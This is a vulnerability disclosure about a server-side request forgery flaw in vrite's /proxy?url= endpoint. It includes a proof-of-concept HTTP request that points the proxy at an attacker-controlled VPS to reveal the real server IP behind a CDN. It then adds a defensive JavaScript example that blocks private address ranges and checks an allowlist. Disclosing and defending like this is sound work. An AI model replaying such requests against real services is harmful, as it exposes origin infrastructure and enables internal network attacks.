SSRF vulnerability in vrite (vriteio/vrite)
Sep 27th 2023
This vulnerability can be used to leak remote server information and to bypass a CDN such as Cloudflare. It can also be used for SSRF attacks.
Proof of Concept
Here we can use it to leak the real IP of the
GET /proxy?url=https://your-vps-ip.nip.io/
Host: app.vrite.io
Origin: localhost
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.vrite.io/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Send a GET request to the remote server, adding Origin: localhost to the request headers.
Set the proxy url parameter to your VPS address, and you will receive a connection from the real vrite server.
An attacker can leak the real IP address of your website and use it to carry out SSRF attacks.
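A destination check that a /proxy?url= handler could apply before fetching, given as an added example that is not vrite's code or its actual fix. ALLOWED_HOSTS, checkProxyTarget and isBlockedAddress are hypothetical names, the caller is assumed to have resolved the hostname already, and IPv6 answers are rejected outright to keep the example short.

```javascript
// Added example: destination checks for a /proxy?url= style endpoint.
// The Origin header is client-supplied, so it plays no part in the decision.
const ALLOWED_HOSTS = new Set(["cdn.example.com"]); // hypothetical allowlist

// IPv4 ranges that must never be reachable through the proxy: [network, prefix length]
const BLOCKED_V4 = [
  ["0.0.0.0", 8], ["10.0.0.0", 8], ["100.64.0.0", 10], ["127.0.0.0", 8],
  ["169.254.0.0", 16], ["172.16.0.0", 12], ["192.168.0.0", 16], ["224.0.0.0", 3],
];

// Convert a dotted quad to an unsigned 32-bit integer, or null if it is not strict IPv4.
function v4ToInt(addr) {
  const parts = addr.split(".");
  const valid = parts.length === 4 &&
    parts.every((p) => /^(0|[1-9]\d{0,2})$/.test(p) && Number(p) <= 255);
  return valid ? parts.reduce((acc, p) => acc * 256 + Number(p), 0) : null;
}

function isBlockedAddress(addr) {
  const n = v4ToInt(addr);
  if (n === null) return true; // not plain IPv4 (including IPv6): fail closed
  return BLOCKED_V4.some(([net, bits]) => {
    const size = 2 ** (32 - bits);
    return Math.floor(n / size) === Math.floor(v4ToInt(net) / size);
  });
}

// rawUrl: the client-supplied url parameter.
// resolvedAddrs: every address DNS returned for the URL's hostname.
function checkProxyTarget(rawUrl, resolvedAddrs) {
  let url;
  try { url = new URL(rawUrl); } catch { return { ok: false, reason: "unparseable URL" }; }
  if (url.protocol !== "https:" && url.protocol !== "http:") return { ok: false, reason: "scheme not allowed" };
  if (url.username || url.password) return { ok: false, reason: "credentials in URL" };
  // Allowlist first: an outbound fetch to any arbitrary host reveals the origin server's IP.
  if (!ALLOWED_HOSTS.has(url.hostname)) return { ok: false, reason: "host not on allowlist" };
  // A public DNS name can resolve to an internal IP, so the check is made on the
  // resolved addresses, not on the hostname string.
  if (resolvedAddrs.length === 0 || resolvedAddrs.some(isBlockedAddress)) {
    return { ok: false, reason: "resolves to a blocked address" };
  }
  // The caller must connect to this exact address to avoid DNS rebinding.
  return { ok: true, connectTo: resolvedAddrs[0] };
}
```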